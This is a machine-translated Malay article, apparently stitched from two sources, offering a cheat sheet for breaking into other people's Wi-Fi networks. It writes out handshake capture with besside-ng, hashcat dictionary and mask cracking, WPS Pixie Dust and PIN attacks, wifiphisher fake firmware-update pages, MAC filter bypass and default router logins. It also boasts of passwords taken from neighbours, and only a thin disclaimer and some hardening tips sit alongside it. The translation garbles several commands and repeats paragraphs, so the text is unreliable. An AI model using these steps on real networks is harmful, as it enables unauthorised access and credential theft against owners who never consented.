Mengendalikan kaedah penggodaman Wi-Fi pada tahun 2020 - ujian peretasan dan penembusan etika

Cara Kerja untuk Menggodam Wi-Fi pada tahun 2020

Adakah mungkin untuk menggodam Wi-Fi sekarang?

Sebelumnya, di bawah artikel mengenai audit keselamatan rangkaian Wi-Fi, mereka memberikan komen dengan semangat "apa yang anda lakukan di sini, anda tidak akan mengambil kata laluan dalam seribu tahun." Nampaknya ini adalah pernyataan yang betul, tetapi jika saya hanya memerlukan akses ke Internet, maka latihan di bandar yang berbeza dan bahkan di negara yang berbeza menunjukkan hasil yang sama: anda SELALU dapat mendapatkan kata laluan dari Wi-Fi.

Kami mempunyai dua faktor untuk kami:

1. Kami tidak perlu menggodam rangkaian Wi-Fi tertentu atau semua rangkaian. Cukup untuk kita mencari satu Titik Akses yang lemah dengan tahap isyarat yang boleh diterima

2. Terdapat beberapa cara yang sangat berkesan, dan jika anda menggunakan semuanya, anda pasti akan dapat mencari rangkaian Wi-Fi yang akan berjaya

Dan semasa melakukan ini, saya merasa berfikir bahawa saya tidak menggunakan buku dalam talian saya sendiri "Menggodam rangkaian Wi-Fi dengan Kali Linux dan BlackArch", sebenarnya, saya menggunakan beberapa kaedah, dan saya melihat buku itu hanya sebagai petunjuk untuk arahan panjang, misalnya, untuk hashcat. Secara umum, pada mulanya saya ingin membuat petikan perintah yang tidak dapat saya ingat, sehingga menjadi seperti cheat sheet. Tetapi kemudian idea muncul untuk mengumpulkan semua kaedah yang paling berkesan, yang bersama-sama selalu memberikan hasil kepada saya.

Ini akan menjadi cheat sheet untuk saya dan untuk pemula, kerana kebanyakan kaedahnya cukup mudah dan hampir semuanya cepat.

Artinya, di satu pihak, artikel ini tidak akan mengandungi kaedah baru yang tidak pernah dipertimbangkan sebelumnya di HackWare.ru, tetapi, di sisi lain, akan ada sesuatu seperti strategi di sini, ketika menggabungkan waktu paling sedikit- kaedah yang memakan masa dan paling berkesan, anda dapat dengan cepat memperoleh akses Internet di lokasi baru.

Berikut adalah contoh kata laluan yang dikumpulkan di tempat kediaman saya sebelumnya (kawasan pedalaman Asia dengan rumah tiga tingkat):

Garisan yang bermula dengan [+] , dilombong dengan OneShot, garis yang bermula dengan {"hasil": benar, "data": { dilombong menggunakan 3WiFi. 3BB-KANCHANANAT dijemput dengan kekuatan kasar. Sebilangan besar kata laluan dikumpulkan dalam 20-30 minit.

Apa yang anda perlukan untuk menggodam Wi-Fi

1. Anda memerlukan bilangan rangkaian tanpa wayar yang mencukupi. Sekiranya anda tinggal di pinggir kampung dan anda mempunyai satu rangkaian Wi-Fi yang dapat anda jangkau, yang tidak dapat anda lihat, tidak mungkin banyak peluang.

Semakin banyak rangkaian di kawasan ini, semakin baik.

2. Tidak ada keperluan perkakasan khas, malah penyesuai Wi-Fi yang tidak menyokong mod monitor sesuai untuk beberapa serangan. Walaupun begitu, saya sangat mengesyorkan adaptor dengan antena luaran, dan jika antena boleh ditanggalkan, maka lebih baik membeli yang lain yang lebih besar. IMHO, separuh daripada "kemahiran" keropok Wi-Fi dalam antena besar ...

Perintah yang diperlukan

Mulai sekarang, saya hanya akan menyebut "penyesuai dalam mod monitor" atau "penyesuai dalam mod terkawal"; Saya tidak akan mendua arahan ini.

Untuk melihat nama antara muka tanpa wayar dan mod semasa mereka:

iw dev 

Untuk menukar kad Wi-Fi ke mod monitor:

pautan sudo ip <INTERFACE> ke bawah 

sudo iw <INTERFACE> tetapkan kawalan monitor

pautan sudo ip <INTERFACE> naik 

Sekiranya serangan tidak memerlukan sambungan Internet (dan bagi beberapa orang, perlu), maka lebih baik menghentikan proses yang mungkin mengganggu (ketika perintah pertama dijalankan, sambungan Internet akan terputus):

sudo systemctl stop NetworkManager 

sudo airmon-ng check kill

Kembali ke mod terurus:

pautan sudo ip <INTERFACE> ke bawah 

sudo iw <INTERFACE> jenis set diuruskan

pautan sudo ip <INTERFACE> naik

Atau cabut dan pasangkan penyesuai Wi-Fi - secara lalai, ia selalu diaktifkan dalam mod terurus.

Sekiranya anda menghentikan NetworkManager, maka untuk memulakannya, jalankan:

sudo systemctl mulakan NetworkManager

Mencari Titik Akses Tanpa Wayar yang Diretas 

Ini adalah kaedah paling mudah dan tidak memerlukan sambungan tanpa wayar, tetapi memerlukan sambungan Internet.

Untuk perinciannya, lihat artikel "Cara mengetahui kata laluan Wi-Fi yang berdekatan dengan cepat (tanpa mod monitor)".

Setelah akhir imbasan, ketika AP yang dilihat diperiksa pada pangkalan data, penyesuai Wi-Fi (yang melakukan imbasan) tidak lagi digunakan. Maksudnya, sementara pemeriksaan dilakukan, Anda dapat melanjutkan ke serangan berikutnya.

Sekiranya anda mempunyai akaun 3WiFi bukan tetamu lain, maka dalam skrip itu sendiri, ganti API dan hapus barisnya

tidur 15;

Dalam kes ini, skrip tidak akan berhenti antara cek.

Di Windows, anda boleh menggunakan Router Scan by Stas'M untuk melihat BSSID, dan kemudian mencari 3WiFi. Untuk perinciannya, lihat artikel "Layanan 3WiFi: Kata Laluan dari Titik Akses Wi-Fi". Sekiranya saya tidak salah, Router Scan secara automatik dapat memeriksa Titik Akses yang dilihatnya menggunakan pangkalan data 3WiFi.

Pixie Dust tiada mod monitor

  • Pengarang mod semasa menulis kepada saya mengenai program OneShot dalam komen - sejak itu adalah program kegemaran saya, saya menjalankannya lebih kerap daripada skrip WiFi-autopwner saya sendiri.
  • Program ini hanya dapat menerima kata laluan dari AP dengan WPS diaktifkan, tetapi tidak memerlukan mod monitor. Dengan serangan Pixie Dust, kata laluan dapat diperoleh dalam beberapa saat. Untuk arahan terperinci, lihat artikel "Cara meretas Wi-Fi dengan penyesuai biasa tanpa mod monitor".

Untuk Windows, analognya adalah Router Scan by Stas'M, untuk perinciannya, lihat artikel "Ciri baru Router Scan oleh Stas'M v2.60: penggodaman tanpa wayar Wi-Fi dari Windows".

Kata laluan kekuatan kasar

Malangnya, tidak banyak titik akses dengan WPS diaktifkan. Walaupun begitu, kami akan kembali kepada mereka kemudian. Sekarang kita akan melihat varian klasik menangkap jabat tangan dan memecahkan kata laluan. Kelajuannya adalah seperti berikut: 

jabat tangan ditangkap secara automatik untuk semua Titik Akses dalam jangkauan dua jenis brute-force dilancarkan dengan Hashcat: menggunakan kamus dan topeng lapan digit. Pengalaman menunjukkan bahawa beberapa TD boleh diterima. Kaedah ini juga mempunyai nisbah masa-ke-nilai yang baik. .

Kami memindahkan antara muka tanpa wayar ke mod monitor.

Kami menjalankan perintah untuk mengumpulkan jabat tangan: 

sudo besside-ng INTERFACE -W Semua jabat tangan akan disimpan ke fail wpa.cap Sekiranya anda akan meretas semuanya, maka anda boleh menukar semuanya sekaligus ke format hashcat menggunakan cap2hccapx: :

cap2hccapx wpa.cap output.hccapx 

Sekiranya anda hanya memerlukan hash Titik Akses tertentu, gunakan nama rangkaian (ESSID) sebagai penapis. Sebagai contoh, saya hanya berminat dengan jabat tangan rangkaian Wi-Fi netis56 .

dan saya mahu menyimpannya ke fail

netis56.hccapx

cap2hccapx wpa.cap netis56.hccapx netis56

Sekiranya anda ingin memisahkan fail wpa.cap menjadi jabat tangan yang terpisah, maka gunakan skrip dari artikel "Cara mengekstrak jabat tangan dari file tangkapan dengan banyak jabat tangan", dan kemudian ubah juga dengan program

cap2hccapx 

Untuk serangan kamus, saya menggunakan kamus rockyou, versi yang dibersihkan boleh dimuat turun dari pautan ini.

  • Contoh penggodaman yang berjaya menggunakan kamus (masa penggodaman 9 saat): Contoh lain dari rehat kamus yang berjaya (waktu rehat 13 saat):
  • Perintah saya untuk menjalankan: hashcat --force --hwmon-temp-abort = 100 -m 2500 -D 1,2 -a 0 'HASH.hccapx' / PATH / TO / rockyou_cleaned.txt
  • Dalam arahan ini, pilihan yang diperlukan adalah: 'HASH.hccapx'

- fail hccapx anda dengan satu atau lebih hash

  • /WAY/TO/rockyou_cleaned.txt - jalan ke kamus
  • -m 2500 - jenis hash yang hendak dipecahkan ditunjukkan
  • Pilihan pilihan: -a 0
  • - jenis serangan: serangan kamus. Mungkin dilangkau, kerana dianggap secara lalai -D 1.2

- bermaksud menggunakan CPU dan kad video untuk memecahkan kata laluan. Sekiranya tidak dinyatakan, kemungkinan hanya kad video yang akan dipilih

- kekuatan 

- bermaksud mengabaikan amaran. Tanpa pilihan ini, pemproses pusat saya tidak digunakan untuk memecahkan kata laluan. Berhati-hati dengan pilihan ini

  • --hwmon-temp-abort = 100 Adakah suhu maksimum di mana daya kasar akan terganggu secara paksa. Saya mempunyai iklim sedemikian rupa sehingga siang hari di dalam bilik selalu lebih dari + 30 ℃, selain itu, saya menggunakan kekerasan pada komputer riba (saya tidak mengesyorkan melakukan ini pada komputer riba !!!), jadi dalam keadaan saya penghalang lalai + 90 ℃ dicapai dengan sangat cepat dan penghentian berhenti. Dengan pilihan ini, tetapkan pada suhu yang lebih tinggi daripada suhu lalai 90, anda sebenarnya boleh membakar komputer / kad video / komputer riba anda. Gunakan secara eksklusif dengan bahaya dan risiko anda sendiri - SAYA MENJAMIN ANDA !!! Walaupun dalam praktiknya suhu saya mencapai 94-96 dan kemudian kad video menurunkan frekuensi - nampaknya, ia juga mempunyai hadnya sendiri. Untuk melancarkan serangan topeng: .
  • hashcat --force --hwmon-temp-abort = 100 -m 2500 -D 1,2 -a 3 'HASH.hccapx'? d? d? d? d? d? d? d? d Baru dalam arahan ini:

? d? d? d? d? d? d? d? d - topeng, bermaksud lapan digit, pada perkakasan saya ia mengambil masa lebih kurang 20 minit. Untuk membuat topeng dengan lebih banyak digit, tambahkan ? d

-a 3

- bermaksud serangan topeng.

Sebagai tambahan kepada kata laluan 8 digit, kata laluan 9-11 digit juga biasa (yang terakhir adalah nombor telefon, jadi anda boleh menentukan topeng sebagai

89? D? D? D? D? D? D? D? D? D

), tetapi setiap digit tambahan meningkatkan masa carian sebanyak 10 kali.

Menggodam WPS dengan pin yang paling mungkin

Sebagai tambahan kepada serangan Pixie Dust yang telah dipertimbangkan, terdapat serangan lain yang sangat menarik pada Titik Akses dengan WPS diaktifkan. Faktanya ialah untuk beberapa model router, pin dihasilkan mengikut algoritma tertentu, misalnya, berdasarkan alamat MAC penghala atau nombor sirinya. Dengan mengetahui data ini, anda boleh menghasilkan satu atau lebih pin yang sangat sesuai untuk titik akses tanpa wayar.

Serangan seperti ini dilaksanakan dalam WiFi-autopwner (keterangan di sini) - skrip ini memerlukan sambungan Internet untuk meminta PIN dalam talian, tetapi perbaikan dilakukan untuk penyesuai pada chipset Ralink (kebanyakannya).

Contoh rangkaian Wi-Fi yang diretas dengan cepat menggunakan kaedah ini:

Serangan lain yang serupa dilaksanakan di airgeddon. Tetapi dalam program ini, serangan WPS tidak berfungsi dengan penyesuai berdasarkan chipset Ralink. Dalam program ini, anda perlu menggunakan, misalnya, Alfa AWUS036NHA (chipset Atheros). Terbaik dengan antena Alfa ARS-N19. Saya juga menggunakan bundle seperti itu.

Untuk keterangan lain, lihat artikel "Pemilihan PIN WPS yang berkesan berdasarkan PIN yang diketahui dan dihasilkan".

Buka rangkaian. Memintas portal memintas

Saya tidak melihat rangkaian terbuka biasa sejak sekian lama. Tetapi terdapat cukup banyak portal memintas.

Ramai daripada mereka boleh diakses menggunakan program hack-tapten-portal, cari butiran dalam artikel "Portal Cepat, Mudah dan Kerja Tawanan (hotspot dengan kebenaran pada antara muka web)". Untuk pengguna yang benar-benar lanjutan, lihat artikel "Bypassing the portal memintas menggunakan OpenVPN". Penyesuai wayarles untuk hacking wi-fi Pilihan yang baik untuk pemula ialah Alfa Awus036nha dengan Antena Alfa Ars-N19. Ini biasanya merupakan penyesuai Wi-Fi yang sangat baik untuk menggodam rangkaian tanpa wayar, termasuk untuk serangan ke atas WPS. The tolak kad ini adalah bahawa ia agak lama dan tidak menyokong protokol moden.

Untuk menyokong protokol moden, anda boleh memilih ALFA dengan antena luar dari senarai ini.

PERHATIAN! Projek

Wifigid.

Ru dan pengarang secara peribadi artikel nerd tidak memanggil untuk penggodaman

Wifi! Terutamanya rangkaian asing !!! Artikel ini ditulis dalam tujuan pendidikan untuk meningkatkan keselamatan maklumat peribadi. Mari kita tinggal dengan selamat!

Di bawah ini dianggap sebagai kaedah umum untuk menggodam rangkaian tanpa wayar dan arahan atau rujukan kepada mereka. Di samping itu, cadangan disediakan untuk meningkatkan perlindungan rangkaian rumah mereka sendiri dari kemungkinan jiran jahat dan penceroboh lain. Saya harap artikel itu berguna untuk semua pembaca. Kami juga mengesyorkan membaca bahan yang dicadangkan dengan lebih terperinci dan meninggalkan komen anda.

  1. Kandungan
  2. Kaedah penggodaman
  3. Rangkaian wayarles menggabungkan banyak teknologi. Dan di mana banyak teknologi ada dan banyak teknologi keselamatan. Dan di bahagian bawah "itik dalam telur" ini terdapat lubang dalam sistem keselamatan. Dan pada setiap lubang yang mungkin ada kaedah serangan sendiri. Dalam bahagian ini, saya ingin menunjukkan semua cara yang mungkin untuk menggodam Wi-Fi dan menembusi rangkaian wayarles. Tetapi yang mana dari pilihan-pilihan ini akan berfungsi, sepenuhnya bergantung kepada keadaan tertentu. Di samping itu, ia boleh berlaku bahawa rangkaian dilindungi sepenuhnya dan tidak tertakluk kepada penggodaman pada masa kini)
  4. Freebie! Berapa banyak keinginan yang menyebabkan freebies dari semua orang. Semua mahu internet orang lain. Tetapi satu perkara adalah dengan cepat merebut kata laluan dan membanggakan rakan sekelas atau menyelamatkan di sebuah asrama di internet, perkara lain adalah untuk menangani teknologi itu sendiri, yang akan membolehkan akses kepada hampir mana-mana rangkaian. Jangan berlari untuk berbangga, hanya kajian dan pemahaman tentang proses akan menjadikan anda pakar dalam bidang ini. Tugas saya sekarang untuk menunjukkan liputan peluang dan keindahan kreatif dalam hal ini.
  5. Cara utama untuk menggodam Wi-Fi orang lain:
  6. Rangkaian tidak dilindungi.
  7. Pemilihan Kata Laluan Manual.
  8. Kata laluan kejam.
  9. Pemilihan kod WPS.

Phishing.

Pangkalan kata laluan.

Memintas penapis.

Pemintasan "jabat tangan" dan penyahkodinya.

Dalam kes saya, perintah ini kelihatan seperti ini:

Menggodam penghala dan mengeluarkan kata laluan terbuka.

Secara ringkas kami akan cuba melihat semua kaedah ini. Saya tidak akan pergi jauh ke dalam butiran, tetapi jika anda tiba-tiba mempunyai soalan - tanya dia dalam komen. Adakah mungkin untuk menggodam?

Rangkaian yang tidak dilindungi

Biasanya pada masa kita semua rangkaian disulitkan dan dilindungi oleh kunci. Kira-kira seperti dalam gambar berikut:

Tetapi masih terdapat titik akses yang tidak dilindungi. Dan mereka boleh disambungkan sepenuhnya - tanpa kata laluan. Contoh titik seperti itu adalah tempat awam, Metro.

Cadangan!
Cadangan!

Sentiasa melindungi kata laluan rangkaian rumah anda.

Pemilihan manual

Dua cara pertama ini ditulis hanya untuk menunjukkan bahawa kadang-kadang menggunakan tindakan teknikal yang kompleks dan tidak boleh, kerana Biasanya segala-galanya kelihatan, ia bernilai sedikit pemikiran.

Rata-rata pengguna biasanya menetapkan kata laluan yang mudah - cuba bayangkan apa yang dia boleh masukkan dan meneka. Ia berfungsi dengan baik untuk mengetahui kata laluan Wi-Fi dari rakan dan jiran. Bagaimana jika anda sudah mengetahui beberapa kata laluan jiran anda? Orang sangat gemar mengulangi diri mereka, dan mereka biasanya memasukkan perkara yang sama. Jarang bekerja, tetapi tepat. Terutama pada rangkaian WEP lama, di mana kata laluan kurang daripada 8 aksara dibenarkan - "12345" dan "QWERTY" sering dijumpai di sana.

TOP 25 kata laluan Wi-Fi yang paling biasa

Banyak penyedia (Rostelecom, ByFly, Yota dan lain-lain) kadang-kadang menggunakan kata laluan "lalai" pada model mereka. Cari mereka di Internet atau di laman web kami, jika anda bernasib baik)

  • Kekerasan
  • Brute Force adalah kaedah kata laluan brute-force secara automatik. Lagipun, anda memasukkan kata laluan dengan bebas? Dan apa yang perlu dilakukan sekiranya anda memaksa program untuk menjalani semua kemungkinan pilihan dan cuba berhubung dengannya.
  • Terdapat nilai tambah - model lama pecah tanpa mengesan serangan dan kata laluan yang lemah (WEP). Terdapat kelemahan - model baru dapat mengesan anda (anda harus bertopeng) dan mengenakan kelewatan kekerasan, atau bahkan larangan sepenuhnya pada mesin penyerang. Kelemahan lain ialah penghala moden memaksa pengguna memasukkan kata laluan panjang yang rumit, yang memerlukan masa bertahun-tahun untuk melakukan kekerasan. Oleh itu, anda harus mencari kaedah lain.
  • Tetapi tetap, cuba selesaikan rangkaian untuk kata laluan ringan, atau jika WEP, dan bukan WPA / WPA2, ia pasti berbaloi. Kebarangkalian lubang sentiasa ada.

Sorotan mengenai Brutus:

Program dapat menggunakan keseluruhan penghitungan pilihan - sesuai untuk rangkaian WEP, atau untuk model penghala yang memaksa anda untuk memaksa kata laluan yang rumit di mana serangan kamus tidak mungkin dilakukan.

Terdapat varian serangan kamus - apabila fail dengan kata laluan yang paling umum dimuat. Terdapat banyak fail ini - dalam satu Kali Linux terdapat beberapa lusin daripadanya, dan berapa banyak yang ada di rangkaian. Bagi saya, cukup untuk memeriksa kata laluan asas dengan senarai kecil - bagaimanapun, penggodaman melalui kekerasan bukan lagi pilihan, tetapi untuk pemeriksaan asas dan menjimatkan masa, senarai paling mudah sudah cukup.

  1. Program ini berfungsi dalam beberapa utas - iaitu secara serentak boleh mencuba banyak pilihan sekaligus. Tetapi ada keanehan di sini: penghala itu sendiri dapat membuang percubaan seperti itu, memperkenalkan kelewatan kebenaran, atau reboot sepenuhnya. Mereka. aliran perlu dimainkan dengan teliti. Dalam apa jua keadaan, periksa semua yang ada pada perkakasan anda, jadi anda pasti akan mengetahui.
  2. Sebilangan orang menulis mengenai proksi ... Tetapi jenis proksi apa yang ada))) Kami berhubung melalui udara) Intinya adalah bahawa beberapa program berjaya menutup permintaan mereka untuk peranti yang berbeza, yang memungkinkan untuk berfungsi dalam pelbagai rangkaian.
  3. Saya akan memberikan pilihan program pada akhirnya - biasanya satu program seperti Aircrack (pemimpin pasaran) dapat melakukan semua tindakan dengan sendirinya. Tidak perlu mencipta semula roda atau memasang 100,500 program. Sementara itu, saya ingin meneruskan perbincangan dengan kaedah penggodaman.

Memintas "jabat tangan"

Salah satu kaedah yang paling berkesan adalah memintas jabat tangan. Apa ini? Juga sejenis kejam murni, hanya dengan pemintas awal cipher dan percubaan selanjutnya untuk menyahsulitnya. Berikut adalah garis panduan ringkas:

Anda duduk dengan senyap di jaring.

Rangkaian rosak.

Komputer anda menyambung semula.

Apa yang berlaku pada saat penyambungan semula: komputer anda menghantar semula kata laluan ke penghala, penghala menerimanya dan, jika berjaya dimasukkan, mewujudkan sambungan. Dalam praktiknya, ini benar-benar tidak dapat dilihat - tidak memutuskan rangkaian, atau memasukkan kata laluan - semuanya dilakukan secara automatik oleh sistem anda sendiri.

Proses menghantar kata laluan ini boleh disebut "jabat tangan" atau "jabat tangan". Tetapi kaedah ini mempunyai kelemahan - data dihantar pada mulanya dalam bentuk yang dienkripsi. Tetapi dengan keinginan yang kuat, cipher ini masih dapat dibongkar menjadi beberapa bahagian (malah ada perkhidmatan) dan membuka data yang dilindungi kata laluan. Dan tidak akan memerlukan lebih banyak masa daripada kekuatan kasar. Ini adalah asas keseluruhan kaedah. Aircrack, yang sudah biasa kita kenal, dapat menembak jabat tangan, dan HashCat (penjana brute-force dan password) dapat memaksa kata laluan. Tetapi lebih baik anda menonton video di atas. Ini adalah cara yang sama ketika mereka memecahkan wifi jiran dengan tenang. Kod WPS

Beberapa penghala mempunyai butang yang sangat tidak berguna - WPS, yang membolehkan anda menyambungkan peranti dalam mod yang dipermudahkan. Secara lalai, banyak penghala masih mengaktifkan WPS. Dan sambungan ke rangkaian seperti itu dilakukan hanya dengan memasukkan kod PIN ini, yang hanya terdiri dari angka.

Kod PIN hanya mempunyai 8 digit. Di atas, saya sudah bercakap mengenai kebolehterimaan WEP brute-force brute-force penuh, tetapi di sini ia lebih mudah - hanya angka. Di samping itu, terdapat korelasi yang membolehkan kaedah membuat pilihan secara berpasangan - 4 digit pertama, dan kemudian 4 digit. Semua ini mempercepat pencarian, dan titik dengan WPS terbuka dapat dipecahkan dalam beberapa jam.

  1. Pilihan serangan lain adalah menggunakan kod lalai. YA! Beberapa peranti berasal dari kilang dengan kod PIN yang sama dihidupkan) Dan program yang dicadangkan sudah mengetahui kata laluan ini, jadi semuanya boleh menjadi lebih mudah.
  2. Cadangan:
  3. lumpuhkan WPS di penghala anda! Kebanyakannya tidak berguna.

Pancingan data Kaedah lain yang menarik adalah memaparkan halaman anda dari pengguna web ... Ya, ini dapat dilakukan tanpa disambungkan ke rangkaian. Tetapi penggantian dapat diperhatikan. Pilihan yang paling sah: .

Jalur akses dengan nama yang sama dari rangkaian yang dikompromikan dibuat.

Tanda dan nama yang baik akan memaksa mangsa untuk menyambungnya cepat atau lambat.

Setelah log masuk, kata laluan dimasukkan, yang berjaya sampai kepada anda.

Dalam kes saya, perintah ini kelihatan seperti ini:

Kaedahnya berfungsi, tetapi di sini anda tidak boleh melakukannya tanpa keberuntungan. Terdapat juga kaedah pelaksanaan perisian yang tersedia, misalnya, menggunakan

Dalam kes saya, perintah ini kelihatan seperti ini:

Wifiphisher

  • Mari kita perhatikan lebih dekat aplikasi ini, kerana vektor serangan menarik. Kami memerlukan Kali Linux (ya, kawan-kawan, semua perisian penggodaman percuma yang hebat dari mana-mana peringkat ada, jadi kenakan) Di terminal, jalankan:

Dalam kes saya, perintah ini kelihatan seperti ini:

wifiphisher

Dalam kes saya, perintah ini kelihatan seperti ini:

Sejurus selepas pelancaran, program mula mencari rangkaian terdekat (semua program dengan penggodaman rangkaian melakukan ini):

Perhatikan jumlah rangkaian. Cari yang anda perlukan dalam senarai ini dan masukkan nombornya. Seterusnya, pelbagai senario serangan akan dicadangkan: Semua pilihan hampir serupa, satu-satunya perbezaan ialah pengguna rangkaian asing akan mendapat kebenaran atau kemas kini perisian. Saya cadangkan memperhatikan perkara berikut:

Halaman Peningkatan Firmware - anda akan diminta untuk mengemas kini firmware penghala itu sendiri. Ia kelihatan menarik dan boleh dipercayai, tetapi anda hanya perlu memasukkan kunci yang sama:

Sementara itu, kata laluan tiba di konsol seperti ini:

Itu sahaja. Penggunaan anggaran semua program adalah berikut. Saya tidak akan membahasnya secara terperinci, jika tidak, keseluruhan buku akan habis. Saya menetapkan vektor serangan, memberi petunjuk - dan anda sudah mengkaji setiap arah secara bebas. Pada akhir artikel, saya akan memberikan bonus menarik dari penggodam profesional bagi mereka yang ingin mendalami.

Hadkan akses ke maklumat PIN, jangan masukkan ke laman web yang meragukan.

Proses menghantar kata laluan ini boleh disebut "jabat tangan" atau "jabat tangan". Tetapi kaedah ini mempunyai kelemahan - data dihantar pada mulanya dalam bentuk yang dienkripsi. Tetapi dengan keinginan yang kuat, cipher ini masih dapat dibongkar menjadi beberapa bahagian (malah ada perkhidmatan) dan membuka data yang dilindungi kata laluan. Dan tidak akan memerlukan lebih banyak masa daripada kekuatan kasar. Ini adalah asas keseluruhan kaedah. Aircrack, yang sudah biasa kita kenal, dapat menembak jabat tangan, dan HashCat (penjana brute-force dan password) dapat memaksa kata laluan. Tetapi lebih baik anda menonton video di atas. Ini adalah cara yang sama ketika mereka memecahkan wifi jiran dengan tenang. Cadangan:

Berhati-hatilah jika rangkaian yang sebelumnya disambungkan secara automatik oleh peranti tanpa masalah meminta kata laluan - terutamanya pada halaman pihak ketiga (kemas kini perisian, kata laluan di VKontakte, dll. - ini tidak berlaku). Perhatikan rangkaian pendua di rumah.

Pangkalan kata laluan.

Terdapat program dan perkhidmatan yang menyimpan pangkalan data kata laluan titik akses tempat duduk awam. Ini benar terutama untuk mana-mana kafe di bandar-bandar besar. Mahu memecahkan kafe itu? Ya, kenapa, biasanya seseorang yang berkaitan dengannya, yang bermaksud ada kemungkinan kata laluan itu dilayari ke pangkalan.

Contoh aplikasi perkhidmatan sedemikian: Peta Wi-Fi atau imbasan penghala. Dan kad akan dipaparkan, dan titik yang ada, dan dirinya sendiri akan disambungkan.

Buat pilihan perkhidmatan dan dalam kes kecurigaan penggodaman, periksa diri anda di pangkalan ini. Malah lebih mudah - ubah kata laluan dari Wi-Fi dalam setengah tahun.

Hacking router.

  • Kadang-kadang anda mempunyai peluang untuk menyambung pada wayar ke Wi-Fi, atau anda tahu alamat IP luaran dari Internet dan anda boleh mengakses router (kadang-kadang anda boleh menentukan dengan banyak kebarangkalian untuk menentukan dan mengimbas).
  • Kemudian anda boleh cuba memilih kata laluan untuk memasuki panel kawalannya. Ramai yang masih meninggalkannya secara lalai admin / admin (login / kata laluan). Dan sudah dalam tetapan, kata laluan Wi-Fi disimpan dalam bentuk terbuka.

Bypass Filters.

Sesetengah titik akses tidak membenarkan anda, semata-mata kerana anda mempunyai alamat MAC yang tidak sesuai. Kadang-kadang ia berlaku. Ini tidak lagi mengenai penggodaman, tetapi kadang-kadang keseluruhan tugas penggodaman dikurangkan untuk mengubah poppy - sebagai contoh, apabila anda sebelum ini berjaya dihubungkan, dan sekarang ia tidak membenarkan apa-apa, kerana Pentadbir atau ibu bapa yang mengharamkan peranti anda di Poppy. Penyelesaiannya adalah mudah - mengubahnya.

  1. Ia berlaku:
  2. Senarai hitam. Kemudian anda hanya perlu menukar alamat itu kepada yang tidak dalam senarai ini. Program Universal - Macchanger.
  3. Senarai putih. Hanya peranti yang dinyatakan di dalamnya disambungkan. Kemudian anda perlu melihat peranti ini dan alamat mereka (airodump-ng sesuai), dan selepas menyesuaikan diri dengan mereka dengan makcheter yang sama.
  4. Perlindungan Rangkaian

Benarkan beberapa masalah untuk memberi perhatian kepada siapa yang boleh menyambung ke rangkaian anda:

Letakkan kata laluan yang canggih pada Wi-Fi.

Letakkan kata laluan yang kompleks pada panel penghala itu sendiri.

  • Apabila Paranas - termasuk menapis alamat MC, hanya membenarkan peranti anda.
  • Matikan WPS (kadang-kadang dipanggil QSS).

Menggodam dari telefon

Semua kaedah di atas adalah terutamanya mengenai penggunaan PC. Persekitaran yang optimum untuk penggodaman masih Kali Linux - semuanya sudah disediakan. Versi melampau ialah Windows. Telefon lebih rumit. Semasa saya menyediakan artikel, saya membaca "penerbitan jiran" dengan cadangan untuk melekat Cali pada EPPLE, atau pelancaran Aircrack-Ng percuma di atas mereka di Android atau iOS, dan bonus dengan pelupusan kata kunci yang aneh - Pendek kata, ia tidak berlaku. Mahu memecahkan - letakkan Kali, jika terdapat hanya telefon - tidak akan ada penyelesaian yang sejuk.

Pada asasnya, semua cadangan dari rangkaian di bidang ini adalah tidak masuk akal. Cadangan saya - masukkan sesuatu seperti "hacking wi-fi" di Google Play atau App Store, dan anda akan menjatuhkan keseluruhan pilihan program. Dan sudah ada mencari melalui ulasan dan tidak meletakkan apa-apa sampah palsu. Perisian kategori utama di sini:

  • Pilihan Kata Laluan WPS secara lalai.
  • Pangkalan data.
  • Tiada pilihan di sini tidak akan - untuk dia anda memerlukan kuasa pengkomputeran, yang telefon (dan beberapa komputer) tidak mempunyai. Jadi sekali lagi - mahu memecahkan dari telefon, meletakkan kentang pada komputer riba / komputer. Sesetengah model telefon pintar Kali dipasang, tetapi jika anda bukan pro, jangan cuba - yang tidak bermakna.

Tanggungjawab

Ramai yang menulis tentang tanggungjawab untuk beberapa artikel Kanun Jenayah Persekutuan Rusia: 272, 273, 274. Masih di universiti, soalan ini dikaji dan kemudiannya mencurigakan. Berikut adalah nama-nama artikel:

272 - Akses haram ke maklumat komputer

273 - Pembuatan, penggunaan dan pengedaran program komputer yang berniat jahat

274 - Pelanggaran peraturan untuk operasi penyimpanan, pemprosesan atau penghantaran maklumat komputer dan rangkaian maklumat dan telekomunikasi

  1. Sebenarnya, hanya 272 yang tinggal di sini. Tetapi mari kita perhatikan lebih dekat:
  2. Akses yang tidak sah ke maklumat komputer yang dilindungi secara sah, jika tindakan ini mengakibatkan pemusnahan, penyekat, pengubahsuaian atau penyalinan maklumat komputer.
  3. Harap maklum bahawa penggunaan Internet, sekiranya tidak menyebabkan kerosakan, secara sederhana, sukar untuk dipasang di sini. Perkara lain jika trafik atau masa dikenakan, dan anda menggunakannya ... Tetapi pada masa ini tidak ada had wi-fi. Apa pun itu, saya secara kategoris tidak menyetujui penjahat dalam lingkaran dalam - bagaimanapun, kita semua adalah saudara, yang jika tidak kita.

Program

Terdapat beberapa program penggodaman yang kuat untuk semua kesempatan. Saya cadangkan memperhatikan perkara berikut:

Windows - Keretakan WiFi

Kali Linux - Aircrack dan syarikat. Ini adalah penggodam Wi-Fi terbaik, kebanyakan manual dari YouTube mengenainya, termasuk video dari artikel ini, menyokong semua kaedah penggodaman, anda boleh menulis artikel yang berasingan dengan selamat. Sangat sesuai untuk bekerja dari komputer riba, tetapi anda juga boleh bekerja dari komputer menggunakan penyesuai Wi-Fi.

Android dan iOS - dibincangkan di atas, lihat di pasaran, bagi saya ini adalah "penggodam palsu" sekiranya "bagaimana jika anda bernasib baik."

Terdapat banyak buku di luar sana mengenai penggodaman Wi-Fi. Terdapat beberapa yang sangat spesifik, tetapi yang tidak lengkap. Dan terdapat keratan lurus yang sangat pendek dengan semua momen menarik. Saya memutuskan untuk berkongsi keratan ini dengan anda. Buku dalam bahasa Inggeris, tetapi tidak menulis mengenai kaedah moden dalam bahasa Rusia. Jadi dari pilihan peribadi. Saya tidak berpura-pura menjadi penulis, siapa yang menyukainya - membayar pengarang. Terdapat semua kaedah di atas, walaupun sedikit lagi, dengan contoh dan arahan:

Dan ini sudah menjadi keseluruhan bab dari panduan EC-Council terkini mengenai melatih penggodam etika. Saya juga merampas dari sumber terbuka, maklumatnya, walaupun dalam bahasa Inggeris, relevan pada masa ini. Tatal - semuanya ada dalam gambar dan ada juga kerja makmal. Semuanya sama, tetapi cantik.

Wifigid.

